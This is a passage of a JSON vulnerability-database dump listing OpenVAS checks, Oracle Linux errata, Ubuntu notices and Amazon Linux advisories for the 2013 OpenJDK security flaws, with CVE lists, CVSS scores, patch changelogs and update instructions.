"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=881822", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2017-07-25T10:51:33"}, {"id": "OPENVAS:1361412562310804117", "type": "openvas", "title": "Oracle Java SE JRE Multiple Unspecified Vulnerabilities-01 Oct 2013 (Windows)", "description": "This host is installed with Oracle Java SE JRE and is prone to multiple\nvulnerabilities.", "published": "2013-10-25T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804117", "cvelist": ["CVE-2013-5782", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5843", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5801", "CVE-2013-5797", "CVE-2013-5804"], "lastseen": "2017-11-13T12:52:38"}, {"id": "OPENVAS:1361412562310841636", "type": "openvas", "title": "Ubuntu Update for openjdk-6 USN-2033-1", "description": "Check for the Version of openjdk-6", "published": "2013-11-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841636", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2018-04-06T11:22:45"}, {"id": "OPENVAS:1361412562310120121", "type": "openvas", "title": "Amazon Linux Local Check: alas-2013-246", "description": "Amazon Linux Local Security Checks", "published": "2015-09-08T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120121", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2017-07-24T12:51:36"}, {"id": "OPENVAS:881819", "type": "openvas", "title": "CentOS Update for java CESA-2013:1505 centos6 ", "description": "Check for the Version of java", "published": "2013-11-08T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=881819", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2017-07-25T10:51:49"}, {"id": "OPENVAS:871062", "type": "openvas", "title": "RedHat Update for java-1.6.0-openjdk RHSA-2013:1505-01", "description": "Check for the Version of java-1.6.0-openjdk", "published": "2013-11-08T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=871062", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2018-01-18T11:09:32"}, {"id": "OPENVAS:1361412562310881822", "type": "openvas", "title": "CentOS Update for java CESA-2013:1505 centos5 ", "description": "Check for the Version of java", "published": "2013-11-08T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881822", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2018-04-09T11:22:07"}, {"id": "OPENVAS:841636", "type": "openvas", "title": "Ubuntu Update for openjdk-6 USN-2033-1", "description": "Check for the Version of openjdk-6", "published": "2013-11-26T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=841636", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2018-01-26T11:10:03"}], "oraclelinux": [{"id": "ELSA-2013-1505", "type": "oraclelinux", "title": "java-1.6.0-openjdk security update", "description": "[1:1.6.0.0-1.68.1.11.14]\n- updated to icedtea6-1.11.14.tar.gz\n- added and applied 1.11.14-fixes.patch, patch10 to fix build issues\n- adapted patch8 java-1.6.0-openjdk-timezone-id.patch\n- Resolves: rhbz#1017618\n[1:1.6.0.1-1.67.1.13.0]\n- reverted previous update\n- Resolves: rhbz#1017618\n[1:1.6.0.1-1.66.1.13.0]\n- updated to icedtea 1.13\n- updated to openjdk-6-src-b28-04_oct_2013\n- added --disable-lcms2 configure switch to fix tck\n- removed upstreamed patch7,java-1.6.0-openjdk-jstack.patch\n- added patch7 1.13_fixes.patch to fix 1.13 build issues\n- adapted patch0 java-1.6.0-openjdk-optflags.patch\n- adapted patch3 java-1.6.0-openjdk-java-access-bridge-security.patch\n- adapted patch8 java-1.6.0-openjdk-timezone-id.patch\n- removed useless runtests parts\n- included also java.security.old files\n- Resolves: rhbz#1017618", "published": "2013-11-05T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://linux.oracle.com/errata/ELSA-2013-1505.html", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2016-09-04T11:15:58"}, {"id": "ELSA-2013-1447", "type": "oraclelinux", "title": "java-1.7.0-openjdk security update", "description": "[1.7.0.45-2.4.3.1.0.1.el5_10]\n- Add oracle-enterprise.patch\n- Fix DISTRO_NAME to 'Enterprise Linux'\n[1.7.0.45-2.4.3.1.el5]\n- Updated to icedtea 2.4.3\n- Resolves: rhbz#1017623\n[1.7.0.45-2.4.3.0.el5]\n- fixed and updated tapset\n- removed bootstrap\n- source 11 redeclared to 1111\n- added source12: TestCryptoLevel.java\n- removed upstreamed patch103 java-1.7.0-openjdk-arm-fixes.patch\n- removed unnecessary patch112 java-1.7.0-openjdk-doNotUseDisabledEcc.patch\n- added patch120: java-1.7.0-openjdk-freetype-check-fix.patch\n- fixed nss\n- cleaned sources\n- Resolves: rhbz#1017623\n[1.7.0.25-2.4.1.4.el5]\n- updated to icedtea 2.4.1\n- improoved handling of patch111 - nss-config-2.patch\n- backported uniquesuffix from 6.5\n- Resolves: rhbz#978421", "published": "2013-10-21T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://linux.oracle.com/errata/ELSA-2013-1447.html", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2016-09-04T11:16:55"}, {"id": "ELSA-2013-1451", "type": "oraclelinux", "title": "java-1.7.0-openjdk security update", "description": "[1.7.0.45-2.4.3.2.0.1.el6]\n- Update DISTRO_NAME in specfile\n[1.7.0.40-2.4.3.1.el6]\n- sync with rhel 6.5 to icedtea 2.4 because of pernament tck failures\n - nss kept disabled\n- Resolves: rhbz#1017626\n[1.7.0.25-2.3.13.4.el6]\n- added back patch408 tck20131015_5.patch, to resolve one of tck failures\n- Resolves: rhbz#1017626\n[1.7.0.25-2.3.13.3.el6]\n- added back patch404 tck20131015_1.patch, to resolve one of tck failures\n- added back patch405 tck20131015_2.patch, to resolve one of tck failures\n- added back patch406 tck20131015_3.patch, to resolve one of tck failures (modified)\n- added back patch407 tck20131015_4.patch, to resolve one of tck failures\n- Resolves: rhbz#1017626\n[1.7.0.25-2.3.13.2.el6]\n- updated to newer security tarball of 2.3.13\n- removed patch405 tck20131015_2.patch, no longer necessary to fix tck failures\n- removed patch406 tck20131015_3.patch, no longer necessary to fix tck failures\n- removed patch407 tck20131015_4.patch, no longer necessary to fix tck failures\n- Resolves: rhbz#1017626\n[1.7.0.25-2.3.13.1.el6]\n- removed useless patch404 tck20131015_1.patch\n- added patch405 tck20131015_2.patch, to resolve one of tck failures\n- added patch406 tck20131015_3.patch, to resolve one of tck failures\n- added patch407 tck20131015_4.patch, to resolve one of tck failures\n- Resolves: rhbz#1017626\n[1.7.0.25-2.3.13.0.el6]\n- security update to 2.3.13\n- adapted java-1.7.0-openjdk-disable-system-lcms.patch (and redeclared to 105)\n- removed bootstrap\n- fixed nss\n- fixed buildver and updatever (Set to 25,30)\n- moved to xz compression of sources\n- all patches moved correctly to prep\n- added patch404 tck20131015_1.patch, to resolve one of tck failures\n- Resolves: rhbz#1017626", "published": "2013-10-22T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://linux.oracle.com/errata/ELSA-2013-1451.html", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2016-09-04T11:16:40"}, {"id": "ELSA-2014-1319", "type": "oraclelinux", "title": "xerces-j2 security update", "description": "[2.11.0-17]\n- Fix XML parsing bug (JAXP, 8017298)\n- Resolves: CVE-2013-4002", "published": "2014-09-29T00:00:00", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "http://linux.oracle.com/errata/ELSA-2014-1319.html", "cvelist": ["CVE-2013-4002"], "lastseen": "2016-09-04T11:16:59"}], "ubuntu": [{"id": "USN-2033-1", "type": "ubuntu", "title": "OpenJDK 6 vulnerabilities", "description": "Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-3829, CVE-2013-5783, CVE-2013-5804)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to availability. An attacker could exploit these to cause a denial of service. (CVE-2013-4002, CVE-2013-5803, CVE-2013-5823, CVE-2013-5825)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to data integrity. (CVE-2013-5772, CVE-2013-5774, CVE-2013-5784, CVE-2013-5797, CVE-2013-5820)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to information disclosure. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-5778, CVE-2013-5780, CVE-2013-5790, CVE-2013-5840, CVE-2013-5849, CVE-2013-5851)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity and availability. An attacker could exploit these to cause a denial of service or expose sensitive data over the network. (CVE-2013-5782, CVE-2013-5802, CVE-2013-5809, CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5830, CVE-2013-5842, CVE-2013-5850)", "published": "2013-11-21T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://usn.ubuntu.com/2033-1/", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2018-03-29T18:17:15"}, {"id": "USN-2089-1", "type": "ubuntu", "title": "OpenJDK 7 vulnerabilities", "description": "Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-3829, CVE-2013-5783, CVE-2013-5804, CVE-2014-0411)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to availability. An attacker could exploit these to cause a denial of service. (CVE-2013-4002, CVE-2013-5803, CVE-2013-5823, CVE-2013-5825, CVE-2013-5896, CVE-2013-5910)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to data integrity. (CVE-2013-5772, CVE-2013-5774, CVE-2013-5784, CVE-2013-5797, CVE-2013-5820, CVE-2014-0376, CVE-2014-0416)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to information disclosure. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-5778, CVE-2013-5780, CVE-2013-5790, CVE-2013-5800, CVE-2013-5840, CVE-2013-5849, CVE-2013-5851, CVE-2013-5884, CVE-2014-0368)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity and availability. An attacker could exploit these to cause a denial of service or expose sensitive data over the network. (CVE-2013-5782, CVE-2013-5802, CVE-2013-5809, CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5830, CVE-2013-5842, CVE-2013-5850, CVE-2013-5878, CVE-2013-5893, CVE-2013-5907, CVE-2014-0373, CVE-2014-0408, CVE-2014-0422, CVE-2014-0428)\n\nA vulnerability was discovered in the OpenJDK JRE related to information disclosure and availability. An attacker could exploit this to expose sensitive data over the network or cause a denial of service. (CVE-2014-0423)", "published": "2014-01-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://usn.ubuntu.com/2089-1/", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5878", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5884", "CVE-2013-5893", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2014-0373", "CVE-2013-5806", "CVE-2013-5805", "CVE-2014-0408", "CVE-2013-5825", "CVE-2014-0376", "CVE-2014-0422", "CVE-2014-0411", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5896", "CVE-2013-5780", "CVE-2013-5910", "CVE-2014-0428", "CVE-2013-5814", "CVE-2014-0368", "CVE-2014-0423", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5907", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2014-0416", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2018-03-29T18:19:01"}], "amazon": [{"id": "ALAS-2013-246", "type": "amazon", "title": "Important: java-1.6.0-openjdk", "description": "**Issue Overview:**\n\nMultiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. ([CVE-2013-5782 __](<https://access.redhat.com/security/cve/CVE-2013-5782>))\n\nThe class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. ([CVE-2013-5830 __](<https://access.redhat.com/security/cve/CVE-2013-5830>))\n\nMultiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. ([CVE-2013-5829 __](<https://access.redhat.com/security/cve/CVE-2013-5829>), [CVE-2013-5814 __](<https://access.redhat.com/security/cve/CVE-2013-5814>), [CVE-2013-5817 __](<https://access.redhat.com/security/cve/CVE-2013-5817>), [CVE-2013-5842 __](<https://access.redhat.com/security/cve/CVE-2013-5842>), [CVE-2013-5850 __](<https://access.redhat.com/security/cve/CVE-2013-5850>))\n\nMultiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions. ([CVE-2013-5809 __](<https://access.redhat.com/security/cve/CVE-2013-5809>))\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. ([CVE-2013-5802 __](<https://access.redhat.com/security/cve/CVE-2013-5802>))\n\nMultiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. ([CVE-2013-5825 __](<https://access.redhat.com/security/cve/CVE-2013-5825>), [CVE-2013-4002 __](<https://access.redhat.com/security/cve/CVE-2013-4002>), [CVE-2013-5823 __](<https://access.redhat.com/security/cve/CVE-2013-5823>))\n\nMultiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. ([CVE-2013-3829 __](<https://access.redhat.com/security/cve/CVE-2013-3829>), [CVE-2013-5840 __](<https://access.redhat.com/security/cve/CVE-2013-5840>), [CVE-2013-5774 __](<https://access.redhat.com/security/cve/CVE-2013-5774>), [CVE-2013-5783 __](<https://access.redhat.com/security/cve/CVE-2013-5783>), [CVE-2013-5820 __](<https://access.redhat.com/security/cve/CVE-2013-5820>), [CVE-2013-5849 __](<https://access.redhat.com/security/cve/CVE-2013-5849>), [CVE-2013-5790 __](<https://access.redhat.com/security/cve/CVE-2013-5790>), [CVE-2013-5784 __](<https://access.redhat.com/security/cve/CVE-2013-5784>))\n\nIt was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. ([CVE-2013-5778 __](<https://access.redhat.com/security/cve/CVE-2013-5778>))\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting attacks. ([CVE-2013-5804 __](<https://access.redhat.com/security/cve/CVE-2013-5804>), [CVE-2013-5797 __](<https://access.redhat.com/security/cve/CVE-2013-5797>))\n\nVarious OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. ([CVE-2013-5780 __](<https://access.redhat.com/security/cve/CVE-2013-5780>))\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. ([CVE-2013-5772 __](<https://access.redhat.com/security/cve/CVE-2013-5772>))\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. ([CVE-2013-5803 __](<https://access.redhat.com/security/cve/CVE-2013-5803>))\n\n \n**Affected Packages:** \n\n\njava-1.6.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.6.0-openjdk_ to update your system. \n\n \n**New Packages:**\n \n \n i686: \n java-1.6.0-openjdk-debuginfo-1.6.0.0-65.1.11.14.57.amzn1.i686 \n java-1.6.0-openjdk-devel-1.6.0.0-65.1.11.14.57.amzn1.i686 \n java-1.6.0-openjdk-1.6.0.0-65.1.11.14.57.amzn1.i686 \n java-1.6.0-openjdk-javadoc-1.6.0.0-65.1.11.14.57.amzn1.i686 \n java-1.6.0-openjdk-src-1.6.0.0-65.1.11.14.57.amzn1.i686 \n java-1.6.0-openjdk-demo-1.6.0.0-65.1.11.14.57.amzn1.i686 \n \n src: \n java-1.6.0-openjdk-1.6.0.0-65.1.11.14.57.amzn1.src \n \n x86_64: \n java-1.6.0-openjdk-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n java-1.6.0-openjdk-src-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n java-1.6.0-openjdk-demo-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n java-1.6.0-openjdk-javadoc-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n java-1.6.0-openjdk-debuginfo-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n java-1.6.0-openjdk-devel-1.6.0.0-65.1.11.14.57.amzn1.x86_64 \n \n \n", "published": "2013-11-05T13:35:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://alas.aws.amazon.com/ALAS-2013-246.html", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2016-09-28T21:03:56"}, {"id": "ALAS-2013-235", "type": "amazon", "title": "Critical: java-1.7.0-openjdk", "description": "**Issue Overview:**\n\nMultiple input checking flaws were found in the 2D component native image parsing code. A specially crafted image file could trigger a Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with the privileges of the user running the Java Virtual Machine. ([CVE-2013-5782 __](<https://access.redhat.com/security/cve/CVE-2013-5782>))\n\nThe class loader did not properly check the package access for non-public proxy classes. A remote attacker could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. ([CVE-2013-5830 __](<https://access.redhat.com/security/cve/CVE-2013-5830>))\n\nMultiple improper permission check issues were discovered in the 2D, CORBA, JNDI, and Libraries components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. ([CVE-2013-5829 __](<https://access.redhat.com/security/cve/CVE-2013-5829>), [CVE-2013-5814 __](<https://access.redhat.com/security/cve/CVE-2013-5814>), [CVE-2013-5817 __](<https://access.redhat.com/security/cve/CVE-2013-5817>), [CVE-2013-5842 __](<https://access.redhat.com/security/cve/CVE-2013-5842>), [CVE-2013-5850 __](<https://access.redhat.com/security/cve/CVE-2013-5850>), [CVE-2013-5838 __](<https://access.redhat.com/security/cve/CVE-2013-5838>))\n\nMultiple input checking flaws were discovered in the JPEG image reading and writing code in the 2D component. An untrusted Java application or applet could use these flaws to corrupt the Java Virtual Machine memory and bypass Java sandbox restrictions. ([CVE-2013-5809 __](<https://access.redhat.com/security/cve/CVE-2013-5809>))\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the javax.xml.transform package transformers. A remote attacker could use this flaw to supply a crafted XML that would be processed without the intended security restrictions. ([CVE-2013-5802 __](<https://access.redhat.com/security/cve/CVE-2013-5802>))\n\nMultiple errors were discovered in the way the JAXP and Security components processes XML inputs. A remote attacker could create a crafted XML that would cause a Java application to use an excessive amount of CPU and memory when processed. ([CVE-2013-5825 __](<https://access.redhat.com/security/cve/CVE-2013-5825>), [CVE-2013-4002 __](<https://access.redhat.com/security/cve/CVE-2013-4002>), [CVE-2013-5823 __](<https://access.redhat.com/security/cve/CVE-2013-5823>))\n\nMultiple improper permission check issues were discovered in the Libraries, Swing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. ([CVE-2013-3829 __](<https://access.redhat.com/security/cve/CVE-2013-3829>), [CVE-2013-5840 __](<https://access.redhat.com/security/cve/CVE-2013-5840>), [CVE-2013-5774 __](<https://access.redhat.com/security/cve/CVE-2013-5774>), [CVE-2013-5783 __](<https://access.redhat.com/security/cve/CVE-2013-5783>), [CVE-2013-5820 __](<https://access.redhat.com/security/cve/CVE-2013-5820>), [CVE-2013-5851 __](<https://access.redhat.com/security/cve/CVE-2013-5851>), [CVE-2013-5800 __](<https://access.redhat.com/security/cve/CVE-2013-5800>), [CVE-2013-5849 __](<https://access.redhat.com/security/cve/CVE-2013-5849>), [CVE-2013-5790 __](<https://access.redhat.com/security/cve/CVE-2013-5790>), [CVE-2013-5784 __](<https://access.redhat.com/security/cve/CVE-2013-5784>))\n\nIt was discovered that the 2D component image library did not properly check bounds when performing image conversions. An untrusted Java application or applet could use this flaw to disclose portions of the Java Virtual Machine memory. ([CVE-2013-5778 __](<https://access.redhat.com/security/cve/CVE-2013-5778>))\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform 